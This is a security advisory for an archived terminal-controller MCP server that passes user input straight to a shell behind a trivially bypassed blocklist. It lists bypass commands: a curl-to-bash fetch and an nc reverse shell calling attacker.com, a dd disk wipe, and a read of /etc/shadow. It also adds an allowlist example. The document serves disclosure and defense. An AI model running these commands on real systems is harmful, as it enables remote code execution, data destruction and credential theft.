Affected Repository
https://github.com/GongRzhe/terminal-controller-mcp
Severity
CRITICAL (CVSS 9.8)
Early Publication Notice
This advisory is published early (before the 90-day deadline) per responsible disclosure policy because:
- The repository is archived (since 2026-03-03) — no maintainer is actively developing patches
- The maintainer (gongrzhe@gmail.com) was notified on 2026-04-11 as a courtesy
- No patch is possible for an archived repository
- Users need immediate warning to stop using this package
Vulnerability Details
The execute_command() function in terminal_controller.py (lines 103-119) passes raw user input directly to asyncio.create_subprocess_shell(shell=True). The only protection is a naive blocklist of strings like rm -rf / and mkfs, which is trivially bypassed.
Technical Analysis
# terminal_controller.py lines 103-119 (approximate)
async def execute_command(command: str) -> str:
    BLOCKLIST = ["rm -rf /", "mkfs"]  # trivially bypassed
    if any(blocked in command for blocked in BLOCKLIST):
        return "Command blocked"
    proc = await asyncio.create_subprocess_shell(
        command,     # raw user input passed to shell
        shell=True,  # critical: enables shell interpretation
        ...
    )
Bypass Examples
dd if=/dev/zero of=/dev/sda — disk wipe, not in blocklist
curl http://attacker.com/shell.sh | bash — remote code execution
nc -e /bin/sh attacker.com 4444 — reverse shell
cat /etc/shadow — credential theft
python3 -c "import os; os.system(open(chr(47)+tmp+chr(47)+x).read())" — indirect execution
Impact
Full RCE on the MCP server host. Any user or AI agent with access to this MCP server can execute arbitrary commands on the host system. The blocklist provides zero meaningful security.
Affected Version
All versions (repository archived, no fix will be released)
Remediation
Stop using this package immediately. The repository is archived and will not receive patches.
If you need terminal access via MCP, consider alternatives that implement proper sandboxing (containers, seccomp profiles, allowlists).
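To make the allowlist option concrete, the following added example (not code from the advisory or from the affected project) runs the advisory's bypass inputs through both the original substring blocklist and an argv allowlist executed without a shell. The `ALLOWED` policy, its binary paths, and the names `to_allowed_argv` and `execute_allowed` are assumptions made for illustration.

```python
import asyncio
import shlex
from typing import List, Optional

# The advisory's blocklist check, reproduced for comparison.
BLOCKLIST = ["rm -rf /", "mkfs"]

def blocklist_permits(command: str) -> bool:
    """True means the substring blocklist would let the command reach the shell."""
    return not any(blocked in command for blocked in BLOCKLIST)

# Assumed policy for this example: command name -> absolute path of the binary.
ALLOWED = {"ls": "/bin/ls", "pwd": "/bin/pwd", "date": "/bin/date"}

def to_allowed_argv(command: str) -> Optional[List[str]]:
    """Split into argv; return it only when argv[0] is on the allowlist."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    return [ALLOWED[argv[0]], *argv[1:]]

async def execute_allowed(command: str) -> str:
    """Hypothetical replacement for execute_command(): exec, never a shell."""
    argv = to_allowed_argv(command)
    if argv is None:
        return "Command rejected"
    # No shell is involved, so "|", ";" and "$()" arrive as literal arguments.
    proc = await asyncio.create_subprocess_exec(
        *argv, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.STDOUT
    )
    out, _ = await proc.communicate()
    return out.decode(errors="replace")

# Inputs copied from the advisory's "Bypass Examples" list.
BYPASSES = [
    "dd if=/dev/zero of=/dev/sda",
    "curl http://attacker.com/shell.sh | bash",
    "nc -e /bin/sh attacker.com 4444",
    "cat /etc/shadow",
    'python3 -c "import os; os.system(open(chr(47)+tmp+chr(47)+x).read())"',
]

if __name__ == "__main__":
    for cmd in BYPASSES:
        print(blocklist_permits(cmd), to_allowed_argv(cmd) is not None, cmd)
```

An allowlist of program names still leaves the arguments unconstrained (`ls` can list any readable path), so it complements the container or seccomp isolation mentioned above and does not replace it.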
Disclosure Timeline
- 2026-04-11: Discovered during MCP security audit
- 2026-04-11: GHSA draft created, maintainer notified via email
- 2026-04-11: Early publication — repo archived, no fix possible